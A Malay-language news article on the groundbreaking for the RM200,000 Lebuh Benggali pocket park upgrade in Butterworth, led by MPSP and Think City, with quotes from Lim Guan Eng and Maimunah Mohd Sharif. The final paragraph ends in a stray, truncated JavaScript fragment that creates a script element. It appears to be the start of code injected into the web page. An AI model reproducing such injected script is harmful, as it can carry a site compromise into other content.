KM puji kolaborasi MPSP, ThinkCity bangunkan Taman Poket Lebuh Benggali

BAGAN DALAM – Ketua Menteri, Y.A.B. Tuan Lim Guan Eng memuji kolaborasi Think City Sdn. Bhd. (ThinkCity) dan Majlis Perbandaran Seberang Perai (MPSP) dalam melaksanakan kerja-kerja pengindahan serta menaik taraf kemudahan awam projek Taman Poket Lebuh Benggali.

Menurut beliau, projek tersebut merupakan salah satu cadangan di bawah garis panduan Pelan Butterworth Baharu yang akan memangkin pertumbuhan masa depan bandar Butterworth.

“Projek ini akan mewujudkan sebuah bandar berdaya huni dan sudah tentu ia mesti hijau.

“Itulah cadangan menaik taraf taman rekreasi ini, (diharap) dapat meningkatkan tahap kesihatan dan kesejahteraan hidup (penduduk),” ujarnya yang juga Ahli Parlimen Bagan ketika merasmikan Majlis Pecah Tanah Projek Naik Taraf Taman Poket Lebuh Benggali Butterworth di sini baru-baru ini.

Turut berucap, Ahli Dewan Undangan Negeri (ADUN) Bagan Dalam, A. Thanasekharan dan Yang di-Pertua MPSP, Dato’ Maimunah Mohd. Sharif.

Hadir sama, Setiausaha Perbandaran, Sr. Rozali Mohamud. Sebelum itu, Maimunah memberitahu, MPSP menandatangani perjanjian persefahaman (MoU) dengan ThinkCity selama lima tahun untuk merealisasikan Pelan Butterworth Baharu.

Di bawah pelan ini, menurutnya, terdapat cadangan projek naik taraf parkir Jalan Jeti Lama menjadi rain garden, kerja-kerja naik taraf kolam renang dan gelanggang permainan Kampung Benggali.

“Kos keseluruhan RM200,000 dengan elemen projek naik taraf taman poket (Lebuh Benggali) ini seperti feature swing, parcourse equipment, park bench, feature play mount serta kemudahan Braille map untuk orang kurang upaya (OKU) penglihatan.

“Selepas siap, saya minta para pengunjung taman poket ini supaya menghargai semua kemudahan yang diberikan, jagalah kemudahan agar lebih baik, jangan ada vandalisme,” seru beliau.

Maimunah memberitahu, kerja-kerja penarafan Taman Poket Lebuh Benggali adalah di atas tanah milik Kerajaan Negeri seluas 1,095 kaki persegi dalam tempoh bulan November 2016 hingga Januari tahun depan, sebelum diserahkan sepenuhnya kepada MPSP Februari 2017.

“Sehingga kini, MPSP mempunyai 1,776 lokasi tanah lapang di Seberang Perai, iaitu taman poket sekitar kawasan kediaman penduduk.

“Direkodkan, MPSP telah membelanjakan RM1.604 juta untuk projek penarafan enam kawasan tanah lapang.

“Itu, tidak termasuk projek menaik taraf sembilan kawasan tanah lapang lain membabitkan pihak swasta, di bawah program tanggungjawab sosial korporat (CSR) dengan nilai kos RM4.437 juta.

“Selain itu, MPSP juga menyelenggara 12 daripada 16 taman rekreasi, seperti Hutan Cherok Tok Kun dan sebagainya demi meningkatkan tahap kesihatan dan kesejahteraan warga penduduk Seberang Perai,” jelasnya.var d=document;var s=d.createElement(‘script’);